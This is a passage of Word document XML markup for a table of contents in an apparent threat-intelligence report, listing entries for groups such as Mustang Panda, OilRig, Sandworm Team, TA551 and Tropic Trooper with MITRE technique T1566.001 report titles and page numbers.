          <w:hyperlink w:anchor="_Toc153480893" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.17</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mustang Panda</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480893 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>151</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="644E6D54" w14:textId="761968E6" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480894" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.17.1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_Toc153480894 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>151</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FC50C0E" w14:textId="2DEE9288" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480895" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.17.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480895 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="356C3513" w14:textId="7956E05E" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480896" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.18</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OilRig</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480896 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>158</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="133CF864" w14:textId="6A96C862" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480897" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.18.1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_Toc153480897 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>158</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2511C9AE" w14:textId="61841C5B" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480898" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.18.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hard Pass: Declining APT34’s Invite to Join Their Professional Network</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480898 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>159</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3672D847" w14:textId="514EDB78" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480899" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.19</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sandworm Team</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480899 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EDFDAE1" w14:textId="01D821FD" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480900" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.19.1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_Toc153480900 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CDCE7B2" w14:textId="149FC41B" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480901" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.19.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 – Six Russian GRU Officers Charged in Connection with Worldwide Deployment of Destructive Malware</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480901 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>164</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61B1582D" w14:textId="759BF3DF" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480902" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.20</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA551</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480902 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>170</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B909F3F" w14:textId="37093487" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480903" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.20.1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_Toc153480903 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>170</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="263A191E" w14:textId="572A0020" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480904" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.20.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480904 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>170</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DE256A9" w14:textId="0FD363C4" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480905" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.21</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tropic Trooper</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480905 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>174</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F23652B" w14:textId="38F6DCAA" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480906" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.21.1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_Toc153480906 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>174</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BECD8F1" w14:textId="7886B935" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
